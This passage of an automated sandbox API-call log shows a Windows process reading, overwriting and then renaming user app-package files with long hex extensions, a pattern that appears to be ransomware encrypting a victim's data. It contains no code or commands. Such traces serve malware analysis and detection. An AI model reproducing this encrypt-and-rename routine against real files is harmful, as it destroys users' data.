lpOverlapped=0x24fff74) returned 1 [0120.376] WriteFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0120.384] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.392] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x24fff70) returned 0x0 [0120.393] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".621D1543012B380EBB8CE848B44CE969C41BEC5135A6B9A7C26232C965044C01" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.621D1543012B380EBB8CE848B44CE969C41BEC5135A6B9A7C26232C965044C01") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.621D1543012B380EBB8CE848B44CE969C41BEC5135A6B9A7C26232C965044C01" [0120.393] GetProcessHeap () returned 0x600000 [0120.393] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x238) returned 0x6dbcf8 [0120.393] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x24fff60, FileInformation=0x6dbcf8, Length=0x238, FileInformationClass=0xa) returned 0x0 [0120.394] CloseHandle (hObject=0x324) returned 1 [0120.395] GetProcessHeap () returned 0x600000 [0120.395] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.396] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.415] ReadFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.416] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.420] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x24fff70) returned 0x0 [0120.420] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".EA4D019489CED510F778F59DBF0A3F9AAFA28BEC69D0AFDFA9B4263ACCAEFB03" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\settings.dat.EA4D019489CED510F778F59DBF0A3F9AAFA28BEC69D0AFDFA9B4263ACCAEFB03") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\settings.dat.EA4D019489CED510F778F59DBF0A3F9AAFA28BEC69D0AFDFA9B4263ACCAEFB03" [0120.420] GetProcessHeap () returned 0x600000 [0120.420] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x192) returned 0x6dbf38 [0120.420] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x24fff60, FileInformation=0x6dbf38, Length=0x192, FileInformationClass=0xa) returned 0x0 [0120.424] CloseHandle (hObject=0x324) returned 1 [0120.424] GetProcessHeap () returned 0x600000 [0120.424] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.425] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.474] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.475] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.509] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x24fff70) returned 0x0 [0120.510] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".361ED56BB43E7B93CDBF8EBA30C5F16452273E29D55D11598B2D5A3E3C7F5524" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.361ED56BB43E7B93CDBF8EBA30C5F16452273E29D55D11598B2D5A3E3C7F5524") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.361ED56BB43E7B93CDBF8EBA30C5F16452273E29D55D11598B2D5A3E3C7F5524" [0120.510] GetProcessHeap () returned 0x600000 [0120.510] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18a) returned 0x6b1e10 [0120.510] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x24fff60, FileInformation=0x6b1e10, Length=0x18a, FileInformationClass=0xa) returned 0x0 [0120.512] CloseHandle (hObject=0x320) returned 1 [0120.513] GetProcessHeap () returned 0x600000 [0120.513] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.514] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.549] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.550] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.551] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x24fff70) returned 0x0 [0120.551] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".0CF30B8A08F2E3E473C31229709BE444320238DE524F6E0B21E68BA62B943A6D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.0CF30B8A08F2E3E473C31229709BE444320238DE524F6E0B21E68BA62B943A6D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.0CF30B8A08F2E3E473C31229709BE444320238DE524F6E0B21E68BA62B943A6D" [0120.551] GetProcessHeap () returned 0x600000 [0120.551] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x21a) returned 0x6dc0d8 [0120.551] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x6dc0d8, Length=0x21a, FileInformationClass=0xa) returned 0x0 [0120.553] CloseHandle (hObject=0x31c) returned 1 [0120.553] GetProcessHeap () returned 0x600000 [0120.553] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.553] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.581] ReadFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.581] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.582] WriteFile (in: hFile=0x324, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.596] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.597] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x24fff70) returned 0x0 [0120.598] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".B52919480DF523FB125C94C97CAFB1D5F17B5228F743DC28E0CBDA04EBCB0212" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.B52919480DF523FB125C94C97CAFB1D5F17B5228F743DC28E0CBDA04EBCB0212") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.B52919480DF523FB125C94C97CAFB1D5F17B5228F743DC28E0CBDA04EBCB0212" [0120.598] GetProcessHeap () returned 0x600000 [0120.598] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x6b2f98 [0120.598] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x24fff60, FileInformation=0x6b2f98, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0120.601] CloseHandle (hObject=0x324) returned 1 [0120.602] GetProcessHeap () returned 0x600000 [0120.602] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.603] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.644] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.644] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.646] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x24fff70) returned 0x0 [0120.647] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".76FA96206B207E19D9DAB1CB21F8F8427B84325CEB9A8D05ABA43B84D4757360" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.76FA96206B207E19D9DAB1CB21F8F8427B84325CEB9A8D05ABA43B84D4757360") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.76FA96206B207E19D9DAB1CB21F8F8427B84325CEB9A8D05ABA43B84D4757360" [0120.647] GetProcessHeap () returned 0x600000 [0120.647] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x23c) returned 0x3106480 [0120.647] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3106480, Length=0x23c, FileInformationClass=0xa) returned 0x0 [0120.648] CloseHandle (hObject=0x31c) returned 1 [0120.648] GetProcessHeap () returned 0x600000 [0120.648] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.648] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.681] ReadFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.681] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.687] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x24fff70) returned 0x0 [0120.688] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".0B6F9F4E8E5C8E00EC39A667F38FDA52609BD6CF70318B5417FCC625376ACD37" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.0B6F9F4E8E5C8E00EC39A667F38FDA52609BD6CF70318B5417FCC625376ACD37") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat.0B6F9F4E8E5C8E00EC39A667F38FDA52609BD6CF70318B5417FCC625376ACD37" [0120.688] GetProcessHeap () returned 0x600000 [0120.688] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19c) returned 0x314c0c8 [0120.688] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x24fff60, FileInformation=0x314c0c8, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0120.691] CloseHandle (hObject=0x324) returned 1 [0120.691] GetProcessHeap () returned 0x600000 [0120.691] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.692] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.755] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.755] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.781] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.784] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.785] WriteFile (in: hFile=0x320, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0120.786] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.786] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x24fff70) returned 0x0 [0120.787] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".F6AAF72658B64013E45E1B98DF82A15E82A4708675096CF7E7A4689E3F886F57" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.F6AAF72658B64013E45E1B98DF82A15E82A4708675096CF7E7A4689E3F886F57") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.F6AAF72658B64013E45E1B98DF82A15E82A4708675096CF7E7A4689E3F886F57" [0120.788] GetProcessHeap () returned 0x600000 [0120.788] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x6b1fa8 [0120.788] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x24fff60, FileInformation=0x6b1fa8, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0120.791] CloseHandle (hObject=0x320) returned 1 [0120.791] GetProcessHeap () returned 0x600000 [0120.791] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0120.792] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.909] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.912] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0120.998] WriteFile (in: hFile=0x324, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0121.001] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0121.108] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0121.109] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0121.192] ReadFile (in: hFile=0x31c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0121.192] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0121.194] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0121.201] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0121.203] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x24fff70) returned 0x0 [0121.203] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".3FA3F4A01F36A2E4D8FFEAA26C8BC051E78DED20AD8A0300061E07982E0AAD78" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.3FA3F4A01F36A2E4D8FFEAA26C8BC051E78DED20AD8A0300061E07982E0AAD78") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.3FA3F4A01F36A2E4D8FFEAA26C8BC051E78DED20AD8A0300061E07982E0AAD78" [0121.203] GetProcessHeap () returned 0x600000 [0121.203] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x208) returned 0x63de78 [0121.204] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x24fff60, FileInformation=0x63de78, Length=0x208, FileInformationClass=0xa) returned 0x0 [0121.209] CloseHandle (hObject=0x320) returned 1 [0121.209] GetProcessHeap () returned 0x600000 [0121.209] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.212] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0121.260] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.271] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0122.001] ReadFile (in: hFile=0x31c, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0122.001] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, 